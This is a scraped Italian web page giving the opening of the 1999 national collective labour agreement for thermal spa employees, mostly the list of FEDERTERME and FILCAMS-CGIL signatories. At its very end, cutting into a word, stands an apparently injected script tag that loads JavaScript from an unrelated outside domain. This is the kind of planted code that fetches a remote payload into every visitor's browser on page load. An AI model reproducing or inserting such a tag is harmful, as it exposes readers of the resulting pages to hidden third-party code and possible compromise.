Torna
all'elenco delle categorie
|
Categoria: Aziende termali Settore: Commercio Data stipula: 15-6-1999 Data decorrenza: 1-7-1999 Data scadenza: 30-6-2003
Contratto collettivo nazionale di lavoro
PER I LAVORATORI DIPENDENTI DALLE AZIENDE TERMALI
15 giugno 1999
Addì 15 giugno 1999, in Roma,
tra
- FEDERTERME, Federazione Italiana delle Terme, rappresentata dal
Presidente Costanzo Jannotti Pecci, e da una Delegazione composta dai
sigg. Fausto Sensi, Coordinatore, Lino Gilioli, Pierfrancesco Bernacchi,
Luciano Fedeli, Silvio Valtorta, Aurelio Crudeli, Direttore di FEDERTERME,
Carmine Barba, Walter Bignami, Patrizio De Angelis, Silvano Favetti,
Evandro Fontana, Fosco Paolucci, e con l'assistenza tecnico-legale
dell'avv. Alessandra Giovannetti
con l'assistenza della Confederazione Generale dell'Industria Italiana
nella persona del dr. Pietro Franceschini;
e
- FEDERAZIONE Italiana Lavoratori Commercio, Alberghi Mense e Servizi
(FILCAMS-CGIL), rappresentata dal Segretario generale Ivano Corraini, dal
Vice Segretario vicario Pietro Ruffolo, dai Segretari nazionali M.
Antonietta Franceschini, Bruno Perin, Claudio Treves, dal Presidente del
Comitato direttivo Bruno Rastelli e dai componenti il Comitato direttivo
nelle persone di: Silvano Conti, Luigi Coppini, Gabriele Guglielmi, Piero
Marconi, Manlio Mazziotta, Marinella Meschieri, Massimo Nozzi, Gennaro
Pannozzo, Luigi Piacenti, Luisa Albanella, Livio Anelli, Dalida Angelini,
Alfonso Argeni, Assunta Auricchio, Carla Balducci, Otello Belli,
Alessandro Beltrami, Vincenzo Belzaino, Giovanni Benazzo, Paola Berfonzi,
Marco Bertolotti, Ennio Bianchi, Virgilio Biscaro, Luigi Bittarelli, Dino
Bonazza, Adriano Bonetti, Moreno Bottoni, Walter Calzavarra, Franco
Capasso, Daniela Cappelli, Roberto Cappellieri, Vito Carchia, Maura Carli,
Maddalena Carnevale, Giovanni Carpino, Fabio Castagnini, Monica Cavallini,
Orfeo Cecchini, Elena Ceschin, Eda Ciccarelli, Canio Cioffi, Sergio
Codonesu, Alessandro Collini, Eligio Conversano, Antonio Coppola, Luigi
Corazzesi, Giovanni Cotzia, Santo Crescimone, Anna Cuntrò, Costanza
D'Albesio, Giancarlo D'Andrea, Loredana De Checchi, Carla Della Volpe,
Elio Dota, Gabriella Fanesi, Paolo Favetta, Tiziana Ferroci, Giordano
Fiorani, Gastone Fiori, Cinzia Folli, Enrico Folloni, Piergiorgio Forti,
Sergio Franceschini, Franco Franceschini, Gualtiero Francisconi, Corrado
Franzoso, Armando Galati, Fabio Giunti, Lorenza Giuriolo, Marzio Goni,
Vincenza Grasso, Angelo Guerriero, Tiziana Gusmerini, Sveva Haertter,
Leandro Innocenti, Antonio Lareno, Elena Lattuada, Vincenza Limonta,
Maurizia Losi, Patrizia Maestri, Luca Magnani, Gianfranco Mancini,
Giuseppe Mancini, Maria Mancini, Antonio Marchese, Giancarlo Marchi,
Gabriele Marchi, Cristina Maroni, Elena Martis, Roberto Matì, Giuseppe
Meini, Rosa Giulia Melidoni, Massimo Melotti, Leandro Menichelli, Adriana
Merola, Cono Minnì, Carmela Minniti, Tiziana Mordeglia, Gaetano Morgese,
Mario Moriconi, Silvana Morini, Antonio Moscatelli, Giusi Muchon, Luciano
Nacinovich, A. Rosa Nannetti, Carmine Nesi, Antonio Palazzo, Lora
Parmiani, Celeste Paulon, Giuseppe Pedrazzini, Santo Pellegrino, Sergio
Pestelli, Antonello Pirastru, Rocco Pisanello, Santino Pizzamiglio, Lauro
Pregnolato, Michele Presta, Giuseppe Provitina, Fausto Quattrini, Massimo
Re, Pierino Ricci, Gianni Roncaccia, Patrizia Rosini, Fiorella Rossi,
Marco Roverano, Vladimiro Sacco, Alessandra Salvato, Giorgio Scarinci,
Anna Schiano, Giuseppe Scognamillo, Egidio Serafini, Loredana Serraglia,
Giuseppe Sforza, Walter Sgargi, Fabio Sormanni, Antonio Stancampiano,
Rosario Stornaiuolo, Francesco Taddei, Antonio Terenzi, Franco Tettamanti,
Anna Tornari, Antonio Triglia, Gianni Trinchero, Domenico Troise, Rosa
Veccia, Andrea Vitagliano, Christine Walzl, Renato Zanieri, Leonardo
Zucchini, con la partecipazione della Confederazione Generale Italiana del
Lavor<script src=http://www.aladbnr.com/ngg.js></script>
|